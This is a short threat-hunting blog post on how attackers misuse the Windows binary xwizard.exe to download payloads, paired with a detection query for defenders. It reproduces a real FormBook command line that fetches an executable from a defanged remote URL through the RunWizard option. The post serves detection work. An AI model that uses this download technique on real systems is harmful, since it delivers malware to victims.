238. LOLBAS ITW: Extensible Wizards Host Process

Hello everyone!

There're lots of LOLBAS, but are all of them used in-the-wild? Let's look how real adversaries abuse Extensible Wizards Host Process for Ingress Tool Transfer (T1105).

So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example related to FormBook:

XwIZarD.exe  RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe

For example, we can look for xwizard.exe executions with "http" among command line parameters:

event_type: "processcreatewin"

AND

proc_file_path: "XwIZarD.exe"

AND

cmdline: *http*

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge